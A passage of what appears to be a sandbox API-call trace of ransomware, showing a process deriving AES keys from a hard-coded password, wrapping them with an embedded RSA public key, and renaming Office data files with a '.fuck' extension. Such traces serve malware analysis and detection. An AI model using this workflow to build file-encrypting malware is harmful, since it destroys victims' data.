users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officebackgroundtaskhandlerregistration.xml.fuck")) returned 0 [0239.505] CryptDestroyHash (hHash=0x28befd8) returned 1 [0239.505] CryptDestroyKey (hKey=0x28beb58) returned 1 [0239.505] CryptReleaseContext (hProv=0x28ab150, dwFlags=0x0) returned 1 [0239.505] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.506] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.506] GetLastError () returned 0x5 [0239.506] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeOsfInstaller.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officeosfinstaller.xml")) returned 0x20 [0239.506] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeOsfInstaller.xml", dwFileAttributes=0x80) returned 0 [0239.506] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeOsfInstaller.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officeosfinstaller.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.507] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeOsfInstaller.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officeosfinstaller.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.507] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeOsfInstaller.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.508] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28acad0) returned 1 [0239.510] CryptCreateHash (in: hProv=0x28acad0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.510] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.510] CryptHashData (hHash=0x28befd8, pbData=0x2857218, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.510] CryptDeriveKey (in: hProv=0x28acad0, Algid=0x6610, hBaseData=0x28befd8, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28bee98) returned 1 [0239.510] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.510] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.510] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28acf10) returned 1 [0239.511] CryptImportPublicKeyInfo (in: hCryptProv=0x28acf10, dwCertEncodingType=0x1, pInfo=0x2899800*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2899830*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2899838*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28bf198) returned 1 [0239.511] CryptEncrypt (in: hKey=0x28bf198, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.511] CryptEncrypt (in: hKey=0x28bf198, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28ad130*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28ad130*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.511] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28ad130, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.511] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.511] CryptEncrypt (in: hKey=0x28bee98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.512] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.512] CloseHandle (hObject=0xffffffff) returned 1 [0239.512] CloseHandle (hObject=0xffffffff) returned 1 [0239.512] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeOsfInstaller.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officeosfinstaller.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeOsfInstaller.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officeosfinstaller.xml"), bFailIfExists=0) returned 0 [0239.512] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeOsfInstaller.xml", dwFileAttributes=0x0) returned 0 [0239.513] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeOsfInstaller.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officeosfinstaller.xml.gsg")) returned 0 [0239.513] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeOsfInstaller.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officeosfinstaller.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeOsfInstaller.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officeosfinstaller.xml.fuck")) returned 0 [0239.514] CryptDestroyHash (hHash=0x28befd8) returned 1 [0239.514] CryptDestroyKey (hKey=0x28bee98) returned 1 [0239.514] CryptReleaseContext (hProv=0x28acad0, dwFlags=0x0) returned 1 [0239.514] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.514] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.514] GetLastError () returned 0x5 [0239.514] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentfallback2016.xml")) returned 0x20 [0239.514] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml", dwFileAttributes=0x80) returned 0 [0239.515] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentfallback2016.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.515] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentfallback2016.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.515] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.516] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28ab150) returned 1 [0239.518] CryptCreateHash (in: hProv=0x28ab150, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.518] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.518] CryptHashData (hHash=0x28befd8, pbData=0x28571c8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.518] CryptDeriveKey (in: hProv=0x28ab150, Algid=0x6610, hBaseData=0x28befd8, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28bee98) returned 1 [0239.518] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.519] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.519] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28ad350) returned 1 [0239.519] CryptImportPublicKeyInfo (in: hCryptProv=0x28ad350, dwCertEncodingType=0x1, pInfo=0x2899660*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2899690*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2899698*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28bf0d8) returned 1 [0239.519] CryptEncrypt (in: hKey=0x28bf0d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.519] CryptEncrypt (in: hKey=0x28bf0d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28ac9c0*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28ac9c0*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.519] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28ac9c0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.519] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.520] CryptEncrypt (in: hKey=0x28bee98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.520] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.520] CloseHandle (hObject=0xffffffff) returned 1 [0239.520] CloseHandle (hObject=0xffffffff) returned 1 [0239.520] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentfallback2016.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentfallback2016.xml"), bFailIfExists=0) returned 0 [0239.520] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml", dwFileAttributes=0x0) returned 0 [0239.521] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentfallback2016.xml.gsg")) returned 0 [0239.521] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentfallback2016.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentfallback2016.xml.fuck")) returned 0 [0239.522] CryptDestroyHash (hHash=0x28befd8) returned 1 [0239.522] CryptDestroyKey (hKey=0x28bee98) returned 1 [0239.522] CryptReleaseContext (hProv=0x28ab150, dwFlags=0x0) returned 1 [0239.522] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.522] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.522] GetLastError () returned 0x5 [0239.522] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentlogon2016.xml")) returned 0x20 [0239.522] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml", dwFileAttributes=0x80) returned 0 [0239.523] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentlogon2016.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.523] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentlogon2016.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.523] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.524] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28ab150) returned 1 [0239.526] CryptCreateHash (in: hProv=0x28ab150, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.526] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.526] CryptHashData (hHash=0x28bf158, pbData=0x2856e80, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.526] CryptDeriveKey (in: hProv=0x28ab150, Algid=0x6610, hBaseData=0x28bf158, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28bf018) returned 1 [0239.527] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.527] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.527] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28ad1b8) returned 1 [0239.527] CryptImportPublicKeyInfo (in: hCryptProv=0x28ad1b8, dwCertEncodingType=0x1, pInfo=0x2899180*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28991b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28991b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28bed98) returned 1 [0239.527] CryptEncrypt (in: hKey=0x28bed98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.527] CryptEncrypt (in: hKey=0x28bed98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28ad2c8*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28ad2c8*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.528] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28ad2c8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.528] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.528] CryptEncrypt (in: hKey=0x28bf018, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.528] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.528] CloseHandle (hObject=0xffffffff) returned 1 [0239.528] CloseHandle (hObject=0xffffffff) returned 1 [0239.528] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentlogon2016.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentlogon2016.xml"), bFailIfExists=0) returned 0 [0239.528] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml", dwFileAttributes=0x0) returned 0 [0239.529] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentlogon2016.xml.gsg")) returned 0 [0239.529] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentlogon2016.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentlogon2016.xml.fuck")) returned 0 [0239.530] CryptDestroyHash (hHash=0x28bf158) returned 1 [0239.530] CryptDestroyKey (hKey=0x28bf018) returned 1 [0239.530] CryptReleaseContext (hProv=0x28ab150, dwFlags=0x0) returned 1 [0239.530] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.530] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.530] GetLastError () returned 0x5 [0239.530] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\msoutilstat.etw.man" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\msoutilstat.etw.man")) returned 0x20 [0239.530] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\msoutilstat.etw.man", dwFileAttributes=0x80) returned 0 [0239.531] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\msoutilstat.etw.man" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\msoutilstat.etw.man"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.531] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\msoutilstat.etw.man.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\msoutilstat.etw.man.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.532] SetFileAttributesA (lpFileName="C:\\\\Users\\All 